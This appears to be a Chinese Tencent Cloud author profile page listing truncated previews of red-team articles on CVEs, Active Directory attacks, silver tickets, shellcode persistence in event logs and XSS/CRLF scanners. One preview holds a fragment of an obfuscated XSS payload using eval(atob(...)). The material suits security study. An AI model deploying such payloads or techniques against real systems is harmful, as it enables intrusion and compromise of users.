暂无搜索历史
Imperva Red Team 最近披露了一个名为 CVE-2022-3656 的漏洞,该漏洞影响超过 25 亿 Google Chrome 和基于 Chro...
做好基线核查和加固是安全管理工作中的基础工作,但却与安全事件密切相关。例如系统账号登录策略未做好合规要求,黑客就可以通过弱口令、默认口令等方式登录系统。但如果做...
通常,红队参与不仅仅是实现域管理员。一些客户希望查看域中的特定用户是否会受到威胁,例如 CEO。
在 Active Directory 的默认配置中,可以在其 WebClient 服务运行时远程接管工作站 (Windows 7/10/11) 和可能的服务器(...
白银票证是针对特定服务的伪造服务或 TGS 票证,可用于在与 Active Directory 企业域连接的受感染系统上保持持久性。在攻击中,攻击者...
在这个数字化转型关键时期,以容器为代表的云原生技术凭借自身的优势,正在逐渐成为核心IT基础设施。云原生已经不再是少部分“创新者”的特权,而是成为了市场主流选择,...
DOMDig 是一个运行在 Chromium 网络浏览器中的 DOM XSS 扫描器,它可以递归地扫描单页应用程序 (SPA)。
ConfluencePot 是针对 Atlassian Confluence 未经身份验证和远程 OGNL 注入漏洞 ( CVE-2022-26...
shellcode 转换为十六进制并写入“密钥管理服务”,事件级别设置为“信息”,源为“持久性”。 运行 SharpEv...
这些问题的根本原因来自常见的系统配置错误,这使得识别和利用这些问题非常可靠。相比之下,传统的基于内存损坏的本地权限提升漏洞通常需要固定偏移量,具...
在这种情况下,我们利用这样一个事实,即从非特权用户上下文中,我们可以诱导以 NT AUTHORITY\SYSTEM 身份运行的本地服务通过 HT...
https://github.com/tr3ee/CVE-2022-23222 近期在对Linux eBPF进行代码审计的过程中,发现了一枚权限提升漏洞...
CRLFsuite 是一款专为扫描而设计的快速工具CRLF injection
生成client、teamserver、implant的exe后,直接执行Teamserver.exe即可启动teamserver
"><input onfocus=eval(atob(http://this.id)) id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlb...
基础研究,参考各种文章,使用频率前 25 位的。这些参数可用于工具或手动使用的参数。
它运行NT AUTHORITY\LOCAL SERVICE并尝试在启动时通过调用加载缺少的cdpsgshims.dllLoadLibrary() DLL ,而不...
Khan安全信息科技有限公司 · CTO (已认证)
暂未填写个人网址
扫码关注腾讯云开发者
领取腾讯云代金券